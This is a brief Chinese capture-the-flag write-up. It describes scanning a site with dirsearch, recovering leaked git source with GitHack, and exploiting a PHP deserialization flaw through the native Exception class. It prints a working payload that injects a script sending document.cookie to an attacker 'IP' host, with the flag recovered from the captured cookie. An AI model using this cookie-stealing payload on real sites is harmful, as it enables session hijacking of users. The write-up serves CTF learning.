打开网站只有gungungun,使用dirsearch扫目录
发现git泄露,于是githack下载源代码,发现有一个index.php
可以看出这里有反序列化漏洞,代码中没有给出类,所以我们只能使用PHP的原生类来序列化构造XSS
payload
<?php
$a = serialize(new Exception("<script>window.location.href='IP'+document.cookie</script>"));
echo urlencode($a);
?>
get传参
最后在burp抓包cookie解码得到flag